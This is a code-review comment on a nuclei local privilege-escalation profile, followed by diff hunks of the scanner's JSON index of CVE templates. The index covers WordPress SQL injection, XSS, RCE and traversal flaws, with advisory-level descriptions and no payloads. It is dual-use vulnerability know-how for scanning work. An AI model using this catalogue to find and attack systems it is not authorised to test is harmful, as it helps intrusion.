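Review bot: This new profile sets `code: true` and `include-tags: local`, which together run the `code`-protocol privesc templates — and those execute commands on the machine running nuclei, not against a remote target (the gtfobins templates in this commit shell out and look for `root` in the output), while `include-tags: local` deliberately re-enables a tag that `.nuclei-ignore` lists as excluded by default. That is presumably the intended use, but the file says none of it, and a user reading the README example could point it at the wrong host; a header comment would cover it: `# Local privilege-escalation profile: enables code-protocol templates, which run commands ON THE SCANNING HOST, and re-includes the 'local' tag that is ignored by default. Intended for a machine you already have a shell on.` Whether nuclei additionally requires a signature or `-code` flag for these templates is outside what the hunk shows, so state that in the comment only after confirming it against the docs.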


@ -265,6 +265,7 @@
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@ -1151,6 +1152,7 @@
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
{"ID":"CVE-2021-24442","Info":{"Name":"Wordpress Polls Widget \u003c 1.5.3 - SQL Injection","Severity":"critical","Description":"The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24442.yaml"}
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"}
{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"}
@ -1165,10 +1167,11 @@
{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"}
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"}
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey \u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
{"ID":"CVE-2021-24849","Info":{"Name":"WCFM WooCommerce Multivendor Marketplace \u003c 3.4.12 - SQL Injection","Severity":"critical","Description":"The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24849.yaml"}
{"ID":"CVE-2021-24862","Info":{"Name":"WordPress RegistrationMagic \u003c5.0.1.6 - Authenticated SQL Injection","Severity":"high","Description":"WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24862.yaml"}
{"ID":"CVE-2021-24875","Info":{"Name":"WordPress eCommerce Product Catalog \u003c3.0.39 - Cross-Site Scripting","Severity":"medium","Description":"WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24875.yaml"}
{"ID":"CVE-2021-24891","Info":{"Name":"WordPress Elementor Website Builder \u003c3.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24891.yaml"}
@ -1178,6 +1181,7 @@
{"ID":"CVE-2021-24926","Info":{"Name":"WordPress Domain Check \u003c1.0.17 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24926.yaml"}
{"ID":"CVE-2021-24931","Info":{"Name":"WordPress Secure Copy Content Protection and Content Locking \u003c2.8.2 - SQL Injection","Severity":"critical","Description":"WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24931.yaml"}
{"ID":"CVE-2021-24940","Info":{"Name":"WordPress Persian Woocommerce \u003c=5.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24940.yaml"}
{"ID":"CVE-2021-24943","Info":{"Name":"Registrations for the Events Calendar \u003c 2.7.6 - SQL Injection","Severity":"critical","Description":"The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24943.yaml"}
{"ID":"CVE-2021-24946","Info":{"Name":"WordPress Modern Events Calendar \u003c6.1.5 - Blind SQL Injection","Severity":"critical","Description":"WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24946.yaml"}
{"ID":"CVE-2021-24947","Info":{"Name":"WordPress Responsive Vector Maps \u003c 6.4.2 - Arbitrary File Read","Severity":"medium","Description":"WordPress Responsive Vector Maps \u003c 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-24947.yaml"}
{"ID":"CVE-2021-24956","Info":{"Name":"Blog2Social \u003c 6.8.7 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social: Social Media Auto Post \u0026 Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24956.yaml"}
@ -2167,6 +2171,7 @@
{"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
{"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
{"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@ -2196,6 +2201,7 @@
{"ID":"CVE-2023-39700","Info":{"Name":"IceWarp Mail Server v10.4.5 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39700.yaml"}
{"ID":"CVE-2023-39796","Info":{"Name":"WBCE 1.6.0 - SQL Injection","Severity":"critical","Description":"There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39796.yaml"}
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40355","Info":{"Name":"Axigen WebMail - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-40355.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
@ -2217,6 +2223,7 @@
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
{"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
{"ID":"CVE-2023-43177","Info":{"Name":"CrushFTP \u003c 10.5.1 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43177.yaml"}
@ -2230,6 +2237,7 @@
{"ID":"CVE-2023-4451","Info":{"Name":"Cockpit - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4451.yaml"}
{"ID":"CVE-2023-4547","Info":{"Name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4547.yaml"}
{"ID":"CVE-2023-45542","Info":{"Name":"MooSocial 3.1.8 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-45542.yaml"}
{"ID":"CVE-2023-45671","Info":{"Name":"Frigate \u003c 0.13.0 Beta 3 - Cross-Site Scripting","Severity":"medium","Description":"Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/\u003ccamera_name\u003e` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-45671.yaml"}
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-45852","Info":{"Name":"Viessmann Vitogate 300 - Remote Code Execution","Severity":"critical","Description":"In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-45852.yaml"}
{"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"}
@ -2244,6 +2252,7 @@
{"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"}
{"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"}
{"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"}
{"ID":"CVE-2023-48777","Info":{"Name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","Severity":"critical","Description":"The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-48777.yaml"}
{"ID":"CVE-2023-49070","Info":{"Name":"Apache OFBiz \u003c 18.12.10 - Arbitrary Code Execution","Severity":"critical","Description":"Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"}
